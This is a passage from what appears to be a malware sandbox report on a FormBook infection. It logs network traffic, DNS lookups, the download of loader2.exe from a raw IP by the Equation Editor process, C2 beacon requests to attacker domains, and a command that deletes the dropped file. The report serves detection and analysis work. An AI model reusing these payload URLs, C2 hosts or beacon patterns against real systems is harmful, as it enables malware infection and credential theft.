Jun 11, 2021 08:06:49.269433975 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269471884 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269484997 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269503117 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269519091 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269535065 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269551039 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269567013 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269583941 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269606113 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269623995 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269639969 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269658089 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269659042 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.269675016 CEST  80           49165      192.210.173.40  192.168.2.22
Jun 11, 2021 08:06:49.269685030 CEST  49165        80         192.168.2.22    192.210.173.40
Jun 11, 2021 08:06:49.269692898 CEST  80           49165      192.210.173.40  192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269702911 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269710064 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269721031 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269727945 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269740105 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269748926 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269754887 CEST4916580192.168.2.22192.210.173.40
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269768953 CEST8049165192.210.173.40192.168.2.22
                                                                                                                                                                                          Jun 11, 2021 08:06:49.269784927 CEST4916580192.168.2.22192.210.173.40

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 08:08:11.429814100 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:11.495436907 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:08:17.104280949 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:17.169647932 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:08:22.954375029 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:23.290237904 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:08:24.818254948 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:24.879548073 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:08:24.880181074 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:25.288223028 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:08:25.288955927 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:25.352297068 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:08:29.375241041 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:29.454852104 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:08:34.719614983 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:08:34.816056967 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 08:08:11.429814100 CEST | 192.168.2.22 | 8.8.8.8 | 0x708c | Standard query (0) | www.alberthospice.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:17.104280949 CEST | 192.168.2.22 | 8.8.8.8 | 0xa14d | Standard query (0) | www.meganfantastic.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:22.954375029 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.adultvideolife.xyz | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:24.818254948 CEST | 192.168.2.22 | 8.8.8.8 | 0x379f | Standard query (0) | www.adultvideolife.xyz | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:24.880181074 CEST | 192.168.2.22 | 8.8.8.8 | 0x379f | Standard query (0) | www.adultvideolife.xyz | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:25.288955927 CEST | 192.168.2.22 | 8.8.8.8 | 0x379f | Standard query (0) | www.adultvideolife.xyz | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:29.375241041 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.sciencebasedmasks.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:34.719614983 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.obi4ex.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 08:08:11.495436907 CEST | 8.8.8.8 | 192.168.2.22 | 0x708c | No error (0) | www.alberthospice.com | | 154.84.76.49 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:17.169647932 CEST | 8.8.8.8 | 192.168.2.22 | 0xa14d | No error (0) | www.meganfantastic.com | | 45.195.169.197 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:23.290237904 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | No error (0) | www.adultvideolife.xyz | | 127.0.0.1 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:24.879548073 CEST | 8.8.8.8 | 192.168.2.22 | 0x379f | No error (0) | www.adultvideolife.xyz | | 127.0.0.1 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:25.288223028 CEST | 8.8.8.8 | 192.168.2.22 | 0x379f | No error (0) | www.adultvideolife.xyz | | 127.0.0.1 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:25.352297068 CEST | 8.8.8.8 | 192.168.2.22 | 0x379f | No error (0) | www.adultvideolife.xyz | | 127.0.0.1 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:08:29.454852104 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | No error (0) | www.sciencebasedmasks.com | www.sciencebasedmasks.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 08:08:34.816056967 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | Server failure (2) | www.obi4ex.com | none | none | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 192.210.173.40
• www.alberthospice.com
• www.meganfantastic.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 192.210.173.40 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:06:48.269107103 CEST | 0 | OUT | GET /files/loader2.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 192.210.173.40
Connection: Keep-Alive
Jun 11, 2021 08:06:48.467674017 CEST | 1 | IN | HTTP/1.1 200 OK
Date: Fri, 11 Jun 2021 06:06:46 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
Last-Modified: Thu, 10 Jun 2021 15:52:54 GMT
ETag: "36dc6-5c46b6262be11"
Accept-Ranges: bytes
Content-Length: 224710
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1:uiuiuiiwiuiiidi!iiitiRichuiPELK\<2p@sp.textZZ\ `.rdatap`@@.datar@.ndata@.rsrcv@@


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 154.84.76.49 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:08:11.805231094 CEST | 237 | OUT | GET /sh2m/?5jYT=m8cHzjtXExYHSn&yb=Gh1YRPKE7hMK2gEPOUx085csD85J3SgCd0zgJLFEns3tcydKC3XMvqZGo/kL+0Opr0Ax6w== HTTP/1.1
Host: www.alberthospice.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:08:12.100292921 CEST | 237 | IN | HTTP/1.1 200 OK
Date: Fri, 11 Jun 2021 06:08:11 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 45.195.169.197 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 08:08:17.470237970 CEST | 238 | OUT | GET /sh2m/?yb=uHvpiI6fXv222fky4svR0qIfr0jRx6IK94tmCuzfhpebrgtGCH2Dzs1/mdmWObBNmZu20A==&5jYT=m8cHzjtXExYHSn HTTP/1.1
Host: www.meganfantastic.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 08:08:17.780684948 CEST | 239 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Fri, 11 Jun 2021 06:08:17 GMT
Content-Type: text/html
Content-Length: 479
Connection: close
ETag: "6080f05e-1df"
Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Code Manipulations

Statistics

Behavior


System Behavior

General

Start time: 08:06:39
Start date: 11/06/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13fc60000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:07:01
Start date: 11/06/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:07:04
Start date: 11/06/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 224710 bytes
MD5 hash: 8C35AC8D43F7E59105902FA16114144E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2148551339.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 23%, Metadefender
• Detection: 41%, ReversingLabs
Reputation: low

General

Start time: 08:07:05
Start date: 11/06/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0x400000
File size: 224710 bytes
MD5 hash: 8C35AC8D43F7E59105902FA16114144E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2184605345.0000000000530000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2184564654.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.2143287241.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2184493776.0000000000270000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 08:07:10
Start date: 11/06/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 08:07:23
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\control.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\control.exe
Imagebase: 0xc20000
File size: 113152 bytes
MD5 hash: 9130377F87A2153FEAB900A00EA1EBFF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355390594.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355480146.0000000000170000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2355508020.00000000001A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 08:07:28
Start date: 11/06/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\Public\vbc.exe'
Imagebase: 0x4a600000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high